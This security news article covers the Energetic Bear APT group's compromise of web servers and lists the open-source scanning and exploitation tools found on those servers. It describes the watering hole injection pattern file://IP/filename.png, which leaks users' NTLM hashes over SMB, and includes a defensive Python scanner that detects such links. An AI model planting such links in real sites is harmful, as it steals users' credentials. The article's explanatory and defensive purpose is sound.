Cyber Attack of APT Group Hack Various Companies Web Servers Using Advanced Hacking Tools

Cyber Attack

A cyber attack is any offensive maneuver that targets computer information systems, infrastructures, computer networks, or personal computing devices. It may be carried out by nation-states, individuals, groups, societies or organizations, and may originate from an anonymous source. A cyber attack may steal, alter, or destroy a specified target by breaking into a susceptible system.

In computers and computer networks, an attack is any attempt to expose, alter, disable, destroy, steal or gain unauthorized access to, or make unauthorized use of, an asset.

Depending on context, a cyber attack can be labelled a cyber campaign, cyberwarfare or cyberterrorism. Cyber attacks range from installing spyware on a personal computer to attempts to destroy the infrastructure of entire nations. They have become increasingly sophisticated and dangerous, as the Stuxnet worm recently demonstrated.

Cyber Attack of APT Group Hack Various Companies Web Servers Using Advanced Hacking Tools

A well-known APT group called Energetic Bear/Crouching Yeti has attacked the servers of various companies, with a strong focus on the energy and industrial sectors around the world.

This cybercrime group has been attacking companies' web servers around the world with numerous malware families since 2010 and has stolen a huge amount of sensitive data.

Mainly during 2016 and early 2017, the Energetic Bear group compromised several web servers belonging to various organizations.

The main task of these attacks is to search for and identify vulnerabilities, gain access to the various hosts, and steal authentication data.

The criminals use phishing emails carrying malicious documents to compromise servers; some of the compromised servers are used for auxiliary purposes, acting as hosts for tools and logs.

The compromised servers were located in Russia, Ukraine, the UK, Germany, Turkey, the USA and other countries, and played various roles in the attacks.

Watering Hole Attack & Scanned Resources

The attackers use a specific pattern to infect watering hole servers: they inject a link into a web page or JS file of the form file://IP/filename.png.

The injected link initially appears to request an image, but it causes the user's machine to connect to the command-and-control server over SMB, which lets the attackers extract the following data from the infected systems:


  • user IP,
  • username,
  • domain name,
  • NTLM hash of the user’s password.


The criminals use various hacking tools such as nmap, dirsearch and sqlmap to scan for vulnerable servers, and compromised servers are then used to conduct attacks on other resources.
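A defensive check that follows from the watering hole pattern above, written as an added example (not code from the article, from Kaspersky or from the group's tooling): scan served HTML/JS content for injected file:// links and flag those whose host lies outside the internal ranges, since such a link makes a browser attempt an SMB connection carrying the user's NTLM credentials. The internal ranges, the Finding fields and the sample page are assumptions constructed for the example.

```python
import ipaddress
import re
from dataclasses import dataclass
from typing import List

# file://<host>/<path> references inside HTML attributes or JS string literals.
# A browser that honours such a link resolves it as a UNC path and may open an
# SMB connection to <host>, sending the user's NTLM hash along with it.
FILE_URL_RE = re.compile(r"""file://+([A-Za-z0-9.\-]+)/([^\s"'<>)]+)""")

# Assumption: only RFC 1918 and loopback ranges count as internal file servers.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]


@dataclass
class Finding:
    host: str
    path: str
    severity: str   # "external": host outside the internal ranges, else "internal"
    context: str    # surrounding text, to help locate where the link was injected


def classify_host(host: str) -> str:
    """Return 'internal' for RFC 1918/loopback literals, 'external' otherwise.
    Hostnames are treated as external: they still trigger an SMB connection
    and should be reviewed by hand."""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return "external"
    return "internal" if any(ip in net for net in INTERNAL_NETS) else "external"


def scan_content(content: str) -> List[Finding]:
    """Scan page or script text for file:// links and classify each host."""
    findings = []
    for m in FILE_URL_RE.finditer(content):
        host, path = m.group(1), m.group(2)
        snippet = content[max(0, m.start() - 30):m.end() + 20].replace("\n", " ")
        findings.append(Finding(host, path, classify_host(host), snippet))
    return findings


# Constructed sample: a benign CDN image, an injected 1x1 image pointing at an
# external IP (TEST-NET-3 documentation range), and a JS string naming an internal share.
SAMPLE_PAGE = """<html><body>
<img src="https://cdn.example.com/logo.png">
<img src="file://203.0.113.10/logo.png" width="1" height="1">
<script>var p = "file://10.0.0.5/share/banner.png";</script>
</body></html>"""
```

Running scan_content over SAMPLE_PAGE yields two findings, the external one being the kind of injection described above; blocking outbound TCP 445 at the perimeter stops the credential leak even when the injection is missed.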




Tools Used For Scanning by APT Group


According to Kaspersky research, most of the tools found on the compromised servers are open-source and publicly available on GitHub:


Nmap – an open-source utility for analyzing the network and verifying its security.

Dirsearch – a simple command-line tool for brute forcing (performing exhaustive searches of) directories and files on websites.

Sqlmap – an open-source penetration testing tool, which automates the process of identifying and exploiting SQL injection vulnerabilities and taking over database servers.

Sublist3r – a tool written in Python designed to enumerate website subdomains. The tool uses open-source intelligence (OSINT). Sublist3r supports many different search engines, such as Google, Yahoo, Bing, Baidu and Ask, as well as such services as Netcraft, Virustotal, ThreatCrowd, DNSdumpster and ReverseDNS. The tool helps penetration testers to collect information on the subdomains of the domain they are researching.

Wpscan – a WordPress vulnerability scanner that uses the blackbox principle, i.e., works without access to the source code. It can be used to scan remote WordPress sites in search of security issues.

Impacket – a toolset for working with various network protocols, which is required by SMBTrap.

SMBTrap – a tool for logging data received over the SMB protocol (user IP address, user name, domain name, password NTLM hash).

Commix – a vulnerability search and command injection and exploitation tool written in Python.

Subbrute – a subdomain enumeration tool available for Python and Windows that uses an open name resolver as a proxy and does not send traffic to the target DNS server.

PHPMailer – a mail sending tool.

After finding vulnerable servers, the attackers try to bypass defenses and inject exploits to gain further access, then pull log files and other sensitive data from the compromised victims.
